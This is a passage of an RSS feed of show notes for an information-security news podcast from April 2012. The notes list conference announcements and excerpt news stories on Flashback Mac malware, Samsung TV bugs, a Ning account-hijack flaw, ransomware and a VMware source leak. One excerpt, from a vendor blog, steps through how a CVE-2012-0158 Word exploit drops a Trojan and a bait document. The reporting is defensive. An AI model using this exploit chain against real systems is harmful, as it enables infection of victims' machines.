<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VMware said it shares source code with industry partners, but other vendors, including Cisco, have had source code leaks in the past without problems, said Charlie Winckless, senior security architect at Presidio Networked Solutions, Greenbelt, Md.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Still, a zero-day vulnerability in ESX could pose significant problems for VMware and the legions of cloud service providers whose infrastructure runs on the hypervisor. Winckless said the availability of ESX source code could give hackers a better chance to find undiscovered vulnerabilities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;How serious this exposure is depends on the level of code audit performed,&quot; Winckless said. &quot;There almost certainly will be some bugs and issues exposed, but it&#39;s far from certain that they are exploitable.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VMware spends a lot of effort guarding against the disaster scenario of attackers compromising multiple virtual servers on a single piece of hardware, which makes it less likely that such an attack could stem from the leaked source code, according to Winckless.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-653-sneakier-flashback-samsung-loop-nissan-and-esx-source-code/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3835/0/infosec-daily-podcast-episode-653.mp3" length="50277859" type="audio/mpeg" />
		<itunes:duration>0:34:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 653 for April 25, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 653 for April 25, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
or simply use our QR Code Links.
Amazon:

Amazon UK:

You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://www.computerworld.com/s/article/9226521/New_sneakier_Flashback_malware_infects_Macs
A new, sneakier variant of the Flashback malware was uncovered yesterday by the French security firm Intego.
Flashback.S, which Intego described Monday, uses the same Java vulnerability as an earlier version that has infected an estimated 820,000 Macs since its appearance and still plagues over 600,000 machines.
But unlike Flashback.K, the variant that first surfaced last month and has caused consternation among Mac users, Flashback.S never asks the victim to enter an administrative password for installation, but instead relies only on the silent exploit of the Java bug to sneak onto the system.
&#34;The differences are very subtle,&#34; Peter James, a spokesman for Intego, said in an interview Tuesday. &#34;There&#39;s no password request [by Flashback.S].&#34;
Flashback.K used different infection tactics: Even though it exploited the same Java vulnerability &#8212; identified as CVE-2012-0507 &#8212; it also displayed the standard OS X password-request dialog. If users entered their password, the malware installed itself in a different location, where it was even harder to detect.
&#8230;.
Source: http://threatpost.com/en_us/blogs/researcher-causes-endless-restart-loop-samsung-tvs-042412
Italian security researcher Luigi Auriemma was trying to play a trick on his brother when he accidentally discovered two vulnerabilities in all current versions of Samsung TVs and Blu-Ray systems that could allow an attacker to gain remote access to those devices.
Auriemma claims that the vulnerabilities will affect all Samsung devices with support for remote controllers, and that the vulnerable protocol is on both TVs and Blu-Ray enabled devices.
One of the bugs leads to a loop of endless restarts while the other could cause a potential buffer overflow.
Auriemma discovered the issues accidentally. He told Threatpost via email that he was trying to play a trick on his brother. He only wanted to send a remote controller request with a funny message, but he ended up nearly destroying the TV.
To exploit A[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 652 &#8211; CVE-2012-0158, Ning, Ransomlock, 20K VRP and Iran</title>
		<link>http://www.isdpodcast.com/episode-652-cve-2012-0158-ning-ransomlock-20k-vrp-and-iran</link>
		<comments>http://www.isdpodcast.com/episode-652-cve-2012-0158-ning-ransomlock-20k-vrp-and-iran#comments</comments>
		<pubDate>Wed, 25 Apr 2012 00:53:48 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3827</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 652 for April 24, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Guest Co-Host Varun Sharma. &#160; Announcements Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 652 for April 24, 2012. </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br />
	Guest Co-Host Varun Sharma.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side. Or simply use our QR Code Links.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:<br />
	</span><img height="135px;" src="https://lh5.googleusercontent.com/Y1LMhV-LIYObJ_3w6npLIuVdhqM4_XPz0NdzkTrQq6GK7Fd_jKDfysFWI9xnkYwy56cHbFExNU87UpjV0qZVUFFZE-GIQ5caCURnc0NwO7KBA1hi7RY" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span><br />
	<img height="138px;" src="https://lh6.googleusercontent.com/v3GrpKdTFMAyzvsNRSdZ1k928WhJit4lxJRr_mbs7NUJPGOdnqBU1fSSLJNaEhdP8E3SGDVQZP_jQgGu8sN2Wjcg1ihsIekj14CKCYuAUbWAROoE7Rw" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blogs.mcafee.com/mcafee-labs/cve-2012-0158-exploit-in-the-wild"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.mcafee.com/mcafee-labs/cve-2012-0158-exploit-in-the-wild</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since last week, we have seen many specially crafted files exploiting CVE-2012-0158, a vulnerability in MSCOMCTL.OCX in Microsoft Office and some other Microsoft products. This exploit can be implemented in a variety of file formats, including RTF, Word, and Excel files. We have already found crafted RTF and Word files in the wild. In the malicious RTF, a vulnerable OLE file is embedded with \object and \objocx tags.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The following image shows an example of a crafted RTF file containing a vulnerable OLE file. You can see the signature of the OLE file in D0CF11E0. &hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Upon opening a crafted file with the vulnerable application, as in other document exploit files, we see an innocent file posing as bait, while in the background, the Trojan files are installed. Here are typical malware installation steps triggered by the vulnerable application, Word in this example:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. The crafted document is opened by a Word process.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Exploiting the vulnerability triggers the shellcode in the OLE file.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. The shellcode installs the Trojan(s) on the victim&rsquo;s machine. Typically, the Trojan is installed in the following path:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">%userProfile%\Local Settings\Temp\(filename).exe</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. The shellcode start a new process of Word and opens as bait an innocent document file embedded in the document. Typically the bait file is dropped at:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">%userProfile%\Local Settings\Temp\(filename).doc</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. The shellcode terminates the Word process that opened the crafted document.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Because of steps 4 and 5, users will see Word quit and then immediately relaunch with the bait file. If you see this symptom, check with your system administrator.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theinquirer.net/inquirer/news/2169403/100-million-users-affected-social-network-vulnerability"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theinquirer.net/inquirer/news/2169403/100-million-users-affected-social-network-vulnerability</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DO IT YOURSELF social networking company Ning is reportedly suffering from a slight security problem that could affect 100 million users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ning lets people set up their own gasbag social networking channels and is used by people like the pop group Radiohead. According to a Dutch report a problem with its security could leave them wide open to account hijackers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://translate.googleusercontent.com/translate_c?act=url&amp;hl=en&amp;ie=UTF8&amp;prev=_t&amp;rurl=translate.google.com&amp;sl=auto&amp;tl=en&amp;twu=1&amp;u=http://webwereld.nl/nieuws/107271/nederlandse-tieners-schieten-communitysite-ning-lek.html&amp;usg=ALkJrhiuQY0ADsjiocIM6AF5D4mQrgn_Jg"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">A Dutch web site called Web Wereld</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> says that two students, Angelo Geels and Alex Brouwer have exploited cookies to gain login control over Ning user accounts. They used a proof of concept that showed they could access 90,000 accounts and 100 million users, but had no intention of exploiting it for malicious purposes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They did suggest that if others were able to use it then they could take over Ning accounts. &quot;You can build an application that automates acquisition of an identity,&quot; said Geels in the report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The students told Ning about the exploit last month and since then the firm has worked to fix it. This is not the first time that security students have worked with Ning, and last year students reported five vulnerabilities that included the threat of credit card theft.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.softpedia.com/news/Experts-Find-Control-Panel-for-Ransomlock-Powered-Ransomware-265732.shtml"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Experts-Find-Control-Panel-for-Ransomlock-Powered-Ransomware-265732.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers have come across another Trojan that fuels such campaigns. The novelty in this scenario is that the control panel that&rsquo;s being utilized in the scheme has been found.</span></p>
<p>&nbsp;</p>
